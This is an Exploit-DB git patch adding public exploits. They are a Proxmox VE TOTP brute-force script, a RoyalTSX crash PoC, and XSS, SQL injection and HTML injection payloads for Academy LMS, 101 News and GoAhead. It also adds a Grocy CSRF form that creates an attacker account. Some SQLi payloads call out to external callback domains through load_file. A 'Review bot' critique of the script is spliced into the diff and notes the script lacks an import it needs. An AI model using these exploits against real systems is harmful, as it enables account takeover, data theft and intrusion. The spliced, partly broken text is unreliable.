From 2aed99237cd1a464536838044637e61761b1e46a Mon Sep 17 00:00:00 2001 From: Exploit-DB Date: Thu, 1 Feb 2024 00:16:32 +0000 Subject: [PATCH] DB: 2024-02-01 8 changes to exploits/shellcodes/ghdb Proxmox VE - TOTP Brute Force RoyalTSX 6.0.1 - RTSZ File Handling Heap Memory Corruption PoC GoAhead Web Server 2.5 - 'goform/formTest' Multiple HTML Injection Vulnerabilities 101 News 1.0 - Multiple-SQLi Academy LMS 6.2 - Reflected XSS Academy LMS 6.2 - SQL Injection Grocy <=4.0.2 - CSRF --- exploits/linux/remote/51763.py | 81 +++++++++++++++ exploits/macos/remote/51764.txt | 149 ++++++++++++++++++++++++++++ exploits/multiple/webapps/51762.txt | 14 +++ exploits/php/webapps/51757.txt | 40 ++++++++ exploits/php/webapps/51758.txt | 46 +++++++++ exploits/php/webapps/51759.txt | 48 +++++++++ exploits/php/webapps/51760.txt | 52 ++++++++++ files_exploits.csv | 7 ++ 8 files changed, 437 insertions(+) create mode 100755 exploits/linux/remote/51763.py create mode 100644 exploits/macos/remote/51764.txt create mode 100644 exploits/multiple/webapps/51762.txt create mode 100644 exploits/php/webapps/51757.txt create mode 100644 exploits/php/webapps/51758.txt create mode 100644 exploits/php/webapps/51759.txt create mode 100644 exploits/php/webapps/51760.txt diff --git a/exploits/linux/remote/51763.py b/exploits/linux/remote/51763.py new file mode 100755 index 000000000..b3674bf73 --- /dev/null +++ b/exploits/linux/remote/51763.py 
@@ -0,0 +1,81 @@
+# Exploit Title: Proxmox VE TOTP Brute Force
+# Date: 09/23/2023
+# Exploit Author: Cory Cline, Gabe Rust
+# Vendor Homepage: https://www.proxmox.com/en/
+# Software Link: http://download.proxmox.com/iso/
+# Version: 5.4 - 7.4-1
+# Tested on: Debian
+# CVE : CVE-2023-43320
+
+import time
+import requests
+import urllib.parse
+import json
+import os
+import urllib3
+
+urllib3.disable_warnings()
+threads=25
+
+#################### REPLACE THESE VALUES #########################
+password="KNOWN PASSWORD HERE"
+username="KNOWN USERNAME HERE"
+target_url="https://HOST:PORT"
+##################################################################
+
+ticket=""
+ticket_username=""
+CSRFPreventionToken=""
+ticket_data={}
+
+auto_refresh_time = 20 # in minutes - 30 minutes before expiration
+last_refresh_time = 0
+
+tokens = [];
+
+for num in range(0,1000000):
+ tokens.append(str(num).zfill(6))
+
+def refresh_ticket(target_url, username, password):
+ global CSRFPreventionToken
+ global ticket_username
+ global ticket_data
+ refresh_ticket_url = target_url + "/api2/extjs/access/ticket"
+ refresh_ticket_cookies = {}
+ refresh_ticket_headers = {}
+ refresh_ticket_data = {"username": username, "password": password, "realm": "pve", "new-format": "1"}
+ ticket_data_raw = urllib.parse.unquote(requests.post(refresh_ticket_url, headers=refresh_ticket_headers, cookies=refresh_ticket_cookies, data=refresh_ticket_data, verify=False).text)
+ ticket_data = json.loads(ticket_data_raw)
+ CSRFPreventionToken = ticket_data["data"]["CSRFPreventionToken"]
+ ticket_username = ticket_data["data"]["username"]
+
+def attack(token):
+ global last_refresh_time
+ global auto_refresh_time
+ global target_url
+ global username
+ global password
+ global ticket_username
+ global ticket_data
+ if ( int(time.time()) > (last_refresh_time + (auto_refresh_time * 60)) ):
+ refresh_ticket(target_url, username, password)
+ last_refresh_time = int(time.time())
+
+ url = target_url + "/api2/extjs/access/ticket"
+ cookies = {}
+ headers = {"Csrfpreventiontoken": CSRFPreventionToken}
+ stage_1_ticket = str(json.dumps(ticket_data["data"]["ticket"]))[1:-1]
+ stage_2_ticket = stage_1_ticket.replace('\\"totp\\":', '\"totp\"%3A').replace('\\"recovery\\":', '\"recovery\"%3A')
+ data = {"username": ticket_username, "tfa-challenge": stage_2_ticket, "password": "totp:" + str(token)}
+ response = requests.post(url, headers=headers, cookies=cookies, data=data, verify=False)
+ if(len(response.text) > 350):
+ print(response.text)
+ os._exit(1)
+
+while(1):
+ refresh_ticket(target_url, username, password)
+ last_refresh_time = int(time.time())
+
+ with concurrent.futures.ThreadPoolExecutor(max_workers=threads) as executor:
+ res = [executor.submit(attack, token) for token in tokens]
+ concurrent.futures.wait(res)
\ No newline at end of file
diff --git a/exploits/macos/remote/51764.txt b/exploits/macos/remote/51764.txt
new file mode 100644
index 000000000..e7882fb82
--- /dev/null
+++ b/exploits/macos/remote/51764.txt
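Review bot: The `while(1)` loop at the bottom of 51763.py references `concurrent.futures.ThreadPoolExecutor` and `concurrent.futures.wait`, but the import block only brings in `time`, `requests`, `urllib.parse`, `json`, `os` and `urllib3`, so the script raises `NameError` on the first iteration; the import block needs `import concurrent.futures`. The success check `if(len(response.text) > 350):` is an undocumented magic number — a comment stating which response it is meant to distinguish from the others would help a maintainer, and the module-level `ticket=""` is never read. On style, `tokens = [];` carries a stray semicolon, `while(1):` is conventionally `while True:`, and in `attack` only `last_refresh_time` is assigned, so the other six `global` declarations (`auto_refresh_time`, `target_url`, `username`, `password`, `ticket_username`, `ticket_data`) are redundant for read-only access.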
@@ -0,0 +1,149 @@ +RoyalTSX 6.0.1 RTSZ File Handling Heap Memory Corruption PoC + + +Vendor: Royal Apps GmbH +Web page: https://www.royalapps.com +Affected version: 6.0.1.1000 (macOS) + +Summary: Royal TS is an ideal tool for system engineers and +other IT professionals who need remote access to systems with +different protocols. Not only easy to use, it enables secure +multi-user document sharing. + +Desc: The application receives SIGABRT after RAPortCheck.createNWConnection() +function is handling the SecureGatewayHost object in the RoyalTSXNativeUI. +When the hostname has an array of around 1600 bytes and Test Connection is +clicked the app crashes instantly. + +Tested on: MacOS 13.5.1 (Ventura) + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2023-5788 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5788.php + + +05.09.2023 + +-- + + +------------------------------------- +Translated Report (Full Report Below) +------------------------------------- + +Process: RoyalTSX [23807] +Path: /Applications/Royal TSX.app/Contents/MacOS/RoyalTSX +Identifier: com.lemonmojo.RoyalTSX.App +Version: 6.0.1 (6.0.1.1000) +Code Type: X86-64 (Native) +Parent Process: launchd [1] +User ID: 503 + +Date/Time: 2023-09-05 16:09:46.6361 +0200 +OS Version: macOS 13.5.1 (22G90) +Report Version: 12 +Bridge OS Version: 7.6 (20P6072) + +Time Awake Since Boot: 21000 seconds +Time Since Wake: 1106 seconds + +System Integrity Protection: enabled + +Crashed Thread: 0 tid_103 Dispatch queue: com.apple.main-thread + +Exception Type: EXC_BAD_ACCESS (SIGABRT) +Exception Codes: KERN_INVALID_ADDRESS at 0x0000000000000050 +Exception Codes: 0x0000000000000001, 0x0000000000000050 + +Termination Reason: Namespace SIGNAL, Code 6 Abort trap: 6 +Terminating Process: RoyalTSX [23807] + +VM Region Info: 0x50 is not in any region. 
Bytes before following region: 140737488273328 + REGION TYPE START - END [ VSIZE] PRT/MAX SHRMOD REGION DETAIL + UNUSED SPACE AT START +---> + shared memory 7ffffffec000-7ffffffed000 [ 4K] r-x/r-x SM=SHM + +Application Specific Information: +abort() called + + +Thread 0 Crashed:: tid_103 Dispatch queue: com.apple.main-thread +0 libsystem_kernel.dylib 0x7ff809ef7202 __pthread_kill + 10 +1 libsystem_pthread.dylib 0x7ff809f2eee6 pthread_kill + 263 +2 libsystem_c.dylib 0x7ff809e55b45 abort + 123 +3 libmonosgen-2.0.1.dylib 0x1028daa1b altstack_handle_and_restore + 235 +4 libmonosgen-2.0.1.dylib 0x102879db6 summarize_frame_internal + 310 +5 libmonosgen-2.0.1.dylib 0x102879f66 summarize_frame + 198 +6 libmonosgen-2.0.1.dylib 0x10287578f mono_walk_stack_full + 1135 +7 libmonosgen-2.0.1.dylib 0x102873944 mono_summarize_managed_stack + 100 +8 libmonosgen-2.0.1.dylib 0x102a0f478 mono_threads_summarize_execute_internal + 1256 +9 libmonosgen-2.0.1.dylib 0x102a0f8aa mono_threads_summarize + 346 +10 libmonosgen-2.0.1.dylib 0x1028e0b67 mono_dump_native_crash_info + 855 +11 libmonosgen-2.0.1.dylib 0x10287864e mono_handle_native_crash + 318 +12 libmonosgen-2.0.1.dylib 0x1027d1966 mono_crashing_signal_handler + 86 +13 libsystem_platform.dylib 0x7ff809f5c5ed _sigtramp + 29 +14 ??? 0x101e9502c ??? 
+15 RoyalTSXNativeUI 0x109e50012 RAPortCheck.createNWConnection() + 290 +16 RoyalTSXNativeUI 0x109e4f6d2 RAPortCheck.connect() + 242 +17 RoyalTSXNativeUI 0x10a021c70 static RASecureGatewayPropertyPageHelper.testConnection(hostname:port:logger:localizer:parentWindow:progressIndicator:testConnectionButton:) + 592 +18 RoyalTSXNativeUI 0x10a0b94e7 RAPropertyPageSecureGatewayMain.testConnection() + 359 +19 RoyalTSXNativeUI 0x10a0b9573 @objc RAPropertyPageSecureGatewayMain.buttonTestConnection_action(_:) + 51 +20 AppKit 0x7ff80d29742c -[NSApplication(NSResponder) sendAction:to:from:] + 323 +21 AppKit 0x7ff80d2972b0 -[NSControl sendAction:to:] + 86 +22 AppKit 0x7ff80d2971e2 __26-[NSCell _sendActionFrom:]_block_invoke + 131 +23 AppKit 0x7ff80d2970eb -[NSCell _sendActionFrom:] + 171 +24 AppKit 0x7ff80d297031 -[NSButtonCell _sendActionFrom:] + 96 +25 AppKit 0x7ff80d293ee5 NSControlTrackMouse + 1816 +26 AppKit 0x7ff80d2937a9 -[NSCell trackMouse:inRect:ofView:untilMouseUp:] + 121 +27 AppKit 0x7ff80d29367c -[NSButtonCell trackMouse:inRect:ofView:untilMouseUp:] + 606 +28 AppKit 0x7ff80d292ac0 -[NSControl mouseDown:] + 659 +29 AppKit 0x7ff80d290f9d -[NSWindow(NSEventRouting) _handleMouseDownEvent:isDelayedEvent:] + 4330 +30 AppKit 0x7ff80d2087d7 -[NSWindow(NSEventRouting) _reallySendEvent:isDelayedEvent:] + 404 +31 AppKit 0x7ff80d208427 -[NSWindow(NSEventRouting) sendEvent:] + 345 +32 AppKit 0x7ff80d206e01 -[NSApplication(NSEvent) sendEvent:] + 345 +33 AppKit 0x7ff80d3413ae -[NSApplication _doModalLoop:peek:] + 360 +34 AppKit 0x7ff80d4c2219 __33-[NSApplication runModalSession:]_block_invoke_2 + 69 +35 AppKit 0x7ff80d4c21c1 __33-[NSApplication runModalSession:]_block_invoke + 78 +36 AppKit 0x7ff80d33f773 _NSTryRunModal + 100 +37 AppKit 0x7ff80d4c20be -[NSApplication runModalSession:] + 128 +38 RoyalTSXNativeUI 0x109f17044 RAPropertiesWindowController._showModal() + 628 +39 RoyalTSXNativeUI 0x109f17548 @objc RAPropertiesWindowController._showModal() + 24 +40 Foundation 
0x7ff80ae84951 -[NSObject(NSThreadPerformAdditions) performSelector:onThread:withObject:waitUntilDone:modes:] + 379 +41 Foundation 0x7ff80ae84676 -[NSObject(NSThreadPerformAdditions) performSelectorOnMainThread:withObject:waitUntilDone:] + 124 +42 libffi.dylib 0x7ff81a5fd8c2 ffi_call_unix64 + 82 +43 libffi.dylib 0x7ff81a5fd214 ffi_call_int + 830 + +Thread 0 crashed with X86 Thread State (64-bit): + rax: 0x0000000000000000 rbx: 0x00007ff84d608700 rcx: 0x00007ff7be10fbc8 rdx: 0x0000000000000000 + rdi: 0x0000000000000103 rsi: 0x0000000000000006 rbp: 0x00007ff7be10fbf0 rsp: 0x00007ff7be10fbc8 + r8: 0x0000000000000212 r9: 0x00007fafaeaf64a8 r10: 0x0000000000000000 r11: 0x0000000000000246 + r12: 0x0000000000000103 r13: 0x00007ff7be110418 r14: 0x0000000000000006 r15: 0x0000000000000016 + rip: 0x00007ff809ef7202 rfl: 0x0000000000000246 cr2: 0x00007ff84d611068 + +Logical CPU: 0 +Error Code: 0x02000148 +Trap Number: 133 + +Thread 0 instruction stream: + 0f 84 24 01 00 00 49 8b-79 08 4c 89 45 c0 89 4d ..$...I.y.L.E..M + d4 48 89 55 c8 4d 89 cc-e8 5d 79 0e 00 48 89 c3 .H.U.M...]y..H.. + 4b 8d 7c 3e 04 48 8b 73-30 ba 8c 00 00 00 e8 07 K.|>.H.s0....... + 7f 25 00 4c 8b 45 c0 48-8b 43 58 4b 89 84 3e a0 .%.L.E.H.CXK..>. + 00 00 00 41 8b 44 24 04-43 89 84 3e 90 00 00 00 ...A.D$.C..>.... + 48 8b 43 38 4b 89 84 3e-a8 00 00 00 48 8b 43 60 H.C8K..>....H.C` + [8b]40 50 43 89 84 3e b0-00 00 00 8b 43 40 43 89 .@PC..>.....C@C. <== + 84 3e b4 00 00 00 48 8b-45 c8 43 89 84 3e 98 00 .>....H.E.C..>.. + 00 00 8b 45 d4 43 89 84-3e 94 00 00 00 eb 18 48 ...E.C..>......H + 8d 05 80 ff 26 00 e9 96-00 00 00 43 c7 84 3e 90 ....&......C..>. + 00 00 00 ff ff ff ff 49-8b 45 10 48 8b 18 41 83 .......I.E.H..A. + 38 00 74 24 4b 8d 7c 3e-04 4d 89 c4 e8 69 d8 14 8.t$K.|>.M...i.. + +Binary Images: + 0x101deb000 - 0x101df6fff com.lemonmojo.RoyalTSX.App (6.0.1) <328845a4-2e68-3c0f-a495-033ac725bb43> /Applications/Royal TSX.app/Contents/MacOS/RoyalTSX +... +... \ No newline at end of file 
diff --git a/exploits/multiple/webapps/51762.txt b/exploits/multiple/webapps/51762.txt new file mode 100644 index 000000000..077594c9c --- /dev/null +++ b/exploits/multiple/webapps/51762.txt @@ -0,0 +1,14 @@ +# Exploit Title: GoAhead Web Server 2.5 - 'goform/formTest' Multiple HTML Injection Vulnerabilities +# Date: 25/9/2023 +# Exploit Author: Syed Affan Ahmed (ZEROXINN) +# Vendor Homepage: https://www.embedthis.com/goahead/ +# Affected Version: 2.5 may be others. +# Tested On Version: 2.5 in ZTE AC3630 + +---------------------------POC--------------------------- + +GoAhead Web Server Version 2.5 is prone to Multiple HTML-injection vulnerabilities due to inadequate input validation. + +HTML Injection can cause the ability to execute within the context of that site. + +http://192.168.0.1/goform/formTest?name=

Hello

&address=

World

\ No newline at end of file diff --git a/exploits/php/webapps/51757.txt b/exploits/php/webapps/51757.txt new file mode 100644 index 000000000..d3582a783 --- /dev/null +++ b/exploits/php/webapps/51757.txt @@ -0,0 +1,40 @@ +# Exploit Title: Academy LMS 6.2 - Reflected XSS +# Exploit Author: CraCkEr +# Date: 29/08/2023 +# Vendor: Creativeitem +# Vendor Homepage: https://creativeitem.com/ +# Software Link: https://demo.creativeitem.com/academy/ +# Tested on: Windows 10 Pro +# Impact: Manipulate the content of the site +# CVE: CVE-2023-4973 +# CWE: CWE-79 - CWE-74 - CWE-707 + + +## Greetings + +The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka +CryptoJob (Twitter) twitter.com/0x0CryptoJob + + +## Description + +The attacker can send to victim a link containing a malicious URL in an email or instant message +can perform a wide variety of actions, such as stealing the victim's session token or login credentials + + +Path: /academy/tutor/filter + +GET parameter 'searched_word' is vulnerable to XSS +GET parameter 'searched_tution_class_type[]' is vulnerable to XSS +GET parameter 'searched_price_type[]' is vulnerable to XSS +GET parameter 'searched_duration[]' is vulnerable to XSS + +https://website/academy/tutor/filter?searched_word=[XSS]&searched_tution_class_type%5B%5D=[XSS]&price_min=1&price_max=9&searched_price_type%5B%5D=[XSS]&searched_duration%5B%5D=[XSS] + + +XSS Payload: + +acoa5">dyzs0 + + +[-] Done \ No newline at end of file diff --git a/exploits/php/webapps/51758.txt b/exploits/php/webapps/51758.txt new file mode 100644 index 000000000..9702c15b7 --- /dev/null +++ b/exploits/php/webapps/51758.txt 
@@ -0,0 +1,46 @@ +# Exploit Title: Academy LMS 6.2 - SQL Injection +# Exploit Author: CraCkEr +# Date: 29/08/2023 +# Vendor: Creativeitem +# Vendor Homepage: https://creativeitem.com/ +# Software Link: https://demo.creativeitem.com/academy/ +# Tested on: Windows 10 Pro +# Impact: Database Access +# CVE: CVE-2023-4974 +# CWE: CWE-89 / CWE-74 / CWE-707 + + +## Greetings + +The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka +CryptoJob (Twitter) twitter.com/0x0CryptoJob + + +## Description + +SQL injection attacks can allow unauthorized access to sensitive data, modification of +data and crash the application or make it unavailable, leading to lost revenue and +damage to a company's reputation. + + +Path: /academy/tutor/filter + +GET parameter 'price_min' is vulnerable to SQL Injection +GET parameter 'price_max' is vulnerable to SQL Injection + +https://website/academy/tutor/filter?searched_word=&searched_tution_class_type%5B%5D=1&price_min=[SQLi]&price_max=[SQLi]&searched_price_type%5B%5D=hourly&searched_duration%5B%5D=0 + +--- +Parameter: price_min (GET) + Type: time-based blind + Title: MySQL >= 5.0.12 time-based blind (query SLEEP) + Payload: searched_word=&searched_tution_class_type[]=1&price_min=(SELECT(0)FROM(SELECT(SLEEP(7)))a)&price_max=9&searched_price_type[]=hourly&searched_duration[]=0 + +Parameter: price_max (GET) + Type: time-based blind + Title: MySQL >= 5.0.12 time-based blind (query SLEEP) + Payload: searched_word=&searched_tution_class_type[]=1&price_min=1&price_max=(SELECT(0)FROM(SELECT(SLEEP(9)))a)&searched_price_type[]=hourly&searched_duration[]=0 +--- + + +[-] Done \ No newline at end of file diff --git a/exploits/php/webapps/51759.txt b/exploits/php/webapps/51759.txt new file mode 100644 index 000000000..be8c6e598 --- /dev/null +++ b/exploits/php/webapps/51759.txt 
@@ -0,0 +1,48 @@ +## Title: 101 News-1.0 Multiple-SQLi +## Author: nu11secur1ty +## Date: 09/16/2023 +## Vendor: https://mayurik.com/ +## Software: https://www.sourcecodester.com/php/16067/best-online-news-portal-project-php-free-download.html +## Reference: https://portswigger.net/web-security/sql-injection + +## Description: +The searchtitle parameter appears to be vulnerable to SQL injection +attacks. The payload '+(select +load_file('\\\\sple0q0yfc2wv1hbekfzk7vtikoec6gu7xvpif64.oastify.com\\utu'))+' +was submitted in the searchtitle parameter. This payload injects a SQL +sub-query that calls MySQL's load_file function with a UNC file path +that references a URL on an external domain. The application +interacted with that domain, indicating that the injected SQL query +was executed. + + +[+]Payload: +```mysql +--- +Parameter: searchtitle (POST) + Type: boolean-based blind + Title: OR boolean-based blind - WHERE or HAVING clause + Payload: searchtitle=-7320%' OR 3167=3167 AND 'urvA%'='urvA + + Type: time-based blind + Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) + Payload: searchtitle=814271'+(select +load_file('\\\\sple0q0yfc2wv1hbekfzk7vtikoec6gu7xvpif64.tupaputka.com\\utu'))+'%' +AND (SELECT 8775 FROM (SELECT(SLEEP(15)))yMEL) AND 'gPWH%'='gPWH + + Type: UNION query + Title: MySQL UNION query (NULL) - 3 columns + Payload: searchtitle=814271'+(select +load_file('\\\\sple0q0yfc2wv1hbekfzk7vtikoec6gu7xvpif64.tupaputka.com\\utu'))+'%' +UNION ALL SELECT +NULL,NULL,NULL,NULL,NULL,CONCAT(0x71627a6a71,0x4b6d704e6546715a6662496571705179434d6d5a71586b567a4278464c564d61766174626f787063,0x7170767071),NULL,NULL# + +## Reproduce: +https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2022/101%20News-1.0 + +## Proof and Exploit: +https://www.nu11secur1ty.com/2023/09/101-news-10-multiple-sqli.html + +System Administrator - Infrastructure Engineer +Penetration Testing Engineer +nu11secur1ty \ No newline at end of file 
diff --git a/exploits/php/webapps/51760.txt b/exploits/php/webapps/51760.txt new file mode 100644 index 000000000..f87c89322 --- /dev/null +++ b/exploits/php/webapps/51760.txt @@ -0,0 +1,52 @@ +# Exploit Title: Grocy <= 4.0.2 CSRF Vulnerability +# Application: Grocy +# Version: <= 4.0.2 +# Date: 09/21/2023 +# Exploit Author: Chance Proctor +# Vendor Homepage: https://grocy.info/ +# Software Link: https://github.com/grocy/grocy +# Tested on: Linux +# CVE : CVE-2023-42270 + + + +Overview +================================================== +When creating a new user in Grocy 4.0.2, the new user request is made using JSON formatting. +This makes it easy to adjust your request since it is a known format. +There is also no CSRF Token or other methods of verification in place to verify where the request is coming from. +This allows for html code to generate a new user as long as the target is logged in and has Create User Permissions. + + + +Proof of Concept +================================================== +Host the following html code via a XSS or delivery via a phishing campaign: + + +
+ + + +
+ + + + +If a user is logged into the Grocy Webapp at time of execution, a new user will be created in the app with the following credentials + + Username: hacker + Password: test + +Note: +In order for this to work, the target must have Create User Permissions. +This is enabled by default. + + + +Proof of Exploit/Reproduce +================================================== +http://xploit.sh/posts/cve-2023-42270/ \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index ac6dce0d0..5fa49729d 100644 --- a/files_exploits.csv +++ b/files_exploits.csv 
@@ -8568,6 +8568,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 4312,exploits/linux/remote/4312.c,"ProFTPd 1.x - 'mod_tls' Remote Buffer Overflow",2007-08-24,netris,remote,linux,21,2007-08-23,2017-08-29,1,,,,,http://www.exploit-db.comproftpd-1.3.0a.tar.gz, 15449,exploits/linux/remote/15449.pl,"ProFTPd IAC 1.3.x - Remote Command Execution",2010-11-07,kingcope,remote,linux,,2010-11-07,2016-12-04,1,CVE-2010-4221,,,http://www.exploit-db.com/screenshots/idlt15500/screen-shot-2010-11-07-at-10044-pm.png,http://www.exploit-db.comproftpd-basic_1.3.3a-4_i386.deb, 16921,exploits/linux/remote/16921.rb,"ProFTPd-1.3.3c - Backdoor Command Execution (Metasploit)",2010-12-03,Metasploit,remote,linux,,2010-12-03,2011-03-06,1,OSVDB-69562,"Metasploit Framework (MSF)",,,, +51763,exploits/linux/remote/51763.py,"Proxmox VE - TOTP Brute Force",2024-01-31,"Cory Cline_ Gabe Rust",remote,linux,,2024-01-31,2024-01-31,0,,,,,, 39499,exploits/linux/remote/39499.txt,"Proxmox VE 3/4 - Insecure Hostname Checking Remote Command Execution",2016-02-26,Sysdream,remote,linux,,2016-02-26,2016-12-04,0,,,,,, 652,exploits/linux/remote/652.c,"Prozilla 1.3.6 - Remote Stack Overflow",2004-11-23,"Serkan Akpolat",remote,linux,8080,2004-11-22,2016-04-19,1,OSVDB-12111;CVE-2004-1120,,,,http://www.exploit-db.comprozilla-1.3.6.tar.gz, 806,exploits/linux/remote/806.c,"Prozilla 1.3.7.3 - Remote Format String",2005-02-09,"Serkan Akpolat",remote,linux,8080,2005-02-08,2016-04-28,1,OSVDB-14181;CVE-2005-0523,,,,http://www.exploit-db.comprozilla_1.3.6.orig.tar.gz, 
@@ -9196,6 +9197,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 41443,exploits/macos/remote/41443.html,"Apple macOS HelpViewer 10.12.1 - XSS Leads to Arbitrary File Execution / Arbitrary File Read",2017-02-23,"Google Security Research",remote,macos,,2017-02-23,2017-04-05,1,CVE-2017-2361;HT207483,Remote,,,,https://bugs.chromium.org/p/project-zero/issues/detail?id=1040 41964,exploits/macos/remote/41964.html,"Apple Safari 10.0.3 - 'JSC::CachedCall' Use-After-Free",2017-05-04,"saelo & niklasb",remote,macos,,2017-05-04,2017-05-05,1,CVE-2017-2491,,,,,https://phoenhex.re/2017-05-04/pwn2own17-cachedcall-uaf 42125,exploits/macos/remote/42125.txt,"Apple Safari 10.1 - Spread Operator Integer Overflow Remote Code Execution",2017-06-06,saelo,remote,macos,,2017-06-06,2017-06-06,0,CVE-2017-2536,,,,,https://phoenhex.re/2017-06-02/arrayspread +51764,exploits/macos/remote/51764.txt,"RoyalTSX 6.0.1 - RTSZ File Handling Heap Memory Corruption PoC",2024-01-31,LiquidWorm,remote,macos,,2024-01-31,2024-01-31,0,,,,,, 45998,exploits/macos/remote/45998.rb,"Safari - Proxy Object Type Confusion (Metasploit)",2018-12-14,Metasploit,remote,macos,,2018-12-14,2018-12-14,1,CVE-2018-4404;CVE-2018-4233,"Metasploit Framework (MSF)",,,,https://raw.githubusercontent.com/rapid7/metasploit-framework/cc7cb7302ef43478292f684f473fadb00f9b4344/modules/exploits/osx/browser/safari_proxy_object_type_confusion.rb 46932,exploits/macos/remote/46932.txt,"Typora 0.9.9.24.6 - Directory Traversal",2019-05-27,"Dhiraj Mishra",remote,macos,,2019-05-27,2019-06-19,0,CVE-2019-12137,,,http://www.exploit-db.com/screenshots/idlt47000/typora.png,, 41449,exploits/macos/webapps/41449.html,"Apple WebKit 10.0.2 - 'FrameLoader::clear' Universal Cross-Site Scripting",2017-02-24,"Google Security Research",webapps,macos,,2017-02-24,2017-02-24,1,CVE-2017-2363;HT207487;HT207485;HT207484;HT207482,,,,,https://bugs.chromium.org/p/project-zero/issues/detail?id=1049 
@@ -11829,6 +11831,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 44996,exploits/multiple/webapps/44996.py,"Gitea 1.4.0 - Remote Code Execution",2018-07-04,"Kacper Szurek",webapps,multiple,,2018-07-10,2018-07-10,0,,,,,,https://security.szurek.pl/gitea-1-4-0-unauthenticated-rce.html 49383,exploits/multiple/webapps/49383.py,"Gitea 1.7.5 - Remote Code Execution",2021-01-06,1F98D,webapps,multiple,,2021-01-06,2021-04-01,1,CVE-2019-11229,,,,, 42392,exploits/multiple/webapps/42392.py,"GitHub Enterprise < 2.8.7 - Remote Code Execution",2017-03-15,orange,webapps,multiple,,2017-07-29,2017-07-29,0,,,,,,http://blog.orange.tw/2017/07/how-i-chained-4-vulnerabilities-on.html +51762,exploits/multiple/webapps/51762.txt,"GoAhead Web Server 2.5 - 'goform/formTest' Multiple HTML Injection Vulnerabilities",2024-01-31,"Syed Affan Ahmed (ZEROXINN)",webapps,multiple,,2024-01-31,2024-01-31,0,,,,,, 35237,exploits/multiple/webapps/35237.txt,"Gogs - 'label' SQL Injection",2014-11-14,"Timo Schmid",webapps,multiple,80,2014-11-14,2017-11-14,0,CVE-2014-8681;OSVDB-114644,,,,, 35238,exploits/multiple/webapps/35238.txt,"Gogs - 'users'/'repos' '?q' SQL Injection",2014-11-14,"Timo Schmid",webapps,multiple,,2014-11-14,2017-11-14,0,CVE-2014-8682;OSVDB-114646;OSVDB-114645,,,,, 48027,exploits/multiple/webapps/48027.txt,"Google Invisible RECAPTCHA 3 - Spoof Bypass",2020-02-07,Matamorphosis,webapps,multiple,,2020-02-07,2020-02-07,0,,,,,, 
@@ -13102,6 +13105,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 42531,exploits/php/webapps/42531.txt,"(Bitcoin / Dogecoin) PHP Cloud Mining Script - Authentication Bypass",2017-08-21,"Ihsan Sencan",webapps,php,,2017-08-21,2017-08-22,0,,,,,, 4896,exploits/php/webapps/4896.pl,"0DayDB 2.3 - 'id' Remote Authentication Bypass",2008-01-11,Pr0metheuS,webapps,php,,2008-01-10,2016-10-26,1,,,,,, 26561,exploits/php/webapps/26561.txt,"1-2-3 Music Store 1.0 - 'Process.php' SQL Injection",2005-11-23,r0t,webapps,php,,2005-11-23,2013-07-03,1,CVE-2005-3855;OSVDB-21074,,,,,https://www.securityfocus.com/bid/15544/info +51759,exploits/php/webapps/51759.txt,"101 News 1.0 - Multiple-SQLi",2024-01-31,nu11secur1ty,webapps,php,,2024-01-31,2024-01-31,0,,,,,, 3832,exploits/php/webapps/3832.txt,"1024 CMS 0.7 - 'download.php' Remote File Disclosure",2007-05-02,Dj7xpl,webapps,php,,2007-05-01,2016-11-21,1,OSVDB-35542;CVE-2007-2507,,,,, 18000,exploits/php/webapps/18000.txt,"1024 CMS 1.1.0 Beta - 'force_download.php' Local File Inclusion",2011-10-19,"Sangyun YOO",webapps,php,,2011-10-19,2011-10-19,0,OSVDB-83431,,,,, 35598,exploits/php/webapps/35598.txt,"1024 CMS 1.1.0 Beta - Multiple Input Validation Vulnerabilities",2011-04-08,"QSecure & Demetris Papapetrou",webapps,php,,2011-04-08,2014-12-23,1,,,,,,https://www.securityfocus.com/bid/47282/info 
@@ -13330,6 +13334,8 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 45600,exploits/php/webapps/45600.txt,"Academic Timetable Final Build 7.0b - Cross-Site Request Forgery (Add Admin)",2018-10-15,"Ihsan Sencan",webapps,php,80,2018-10-15,2018-10-18,0,,"Cross-Site Request Forgery (CSRF)",,,http://www.exploit-db.comAcademic_Timetable_Final_Build_v70.zip, 51654,exploits/php/webapps/51654.txt,"Academy LMS 6.0 - Reflected XSS",2023-08-04,CraCkEr,webapps,php,,2023-08-04,2023-08-04,0,CVE-2023-4119,,,,, 51702,exploits/php/webapps/51702.txt,"Academy LMS 6.1 - Arbitrary File Upload",2023-09-04,CraCkEr,webapps,php,,2023-09-04,2023-09-04,0,,,,,, +51757,exploits/php/webapps/51757.txt,"Academy LMS 6.2 - Reflected XSS",2024-01-31,CraCkEr,webapps,php,,2024-01-31,2024-01-31,0,,,,,, +51758,exploits/php/webapps/51758.txt,"Academy LMS 6.2 - SQL Injection",2024-01-31,CraCkEr,webapps,php,,2024-01-31,2024-01-31,0,,,,,, 36110,exploits/php/webapps/36110.txt,"ACal 2.2.6 - 'calendar.php' Cross-Site Scripting",2011-09-02,T0xic,webapps,php,,2011-09-02,2015-04-18,1,,,,,http://www.exploit-db.comACal-2.2.6.zip,https://www.securityfocus.com/bid/49442/info 1763,exploits/php/webapps/1763.txt,"ACal 2.2.6 - 'day.php' Remote File Inclusion",2006-05-07,PiNGuX,webapps,php,,2006-05-06,2015-04-18,1,OSVDB-25340;CVE-2006-2261,,,,http://www.exploit-db.comACal-2.2.6.zip, 38697,exploits/php/webapps/38697.txt,"ACal 2.2.6 - 'view' Local File Inclusion",2013-08-15,ICheer_No0M,webapps,php,,2013-08-15,2015-11-15,1,OSVDB-96304,,,,,https://www.securityfocus.com/bid/61801/info 
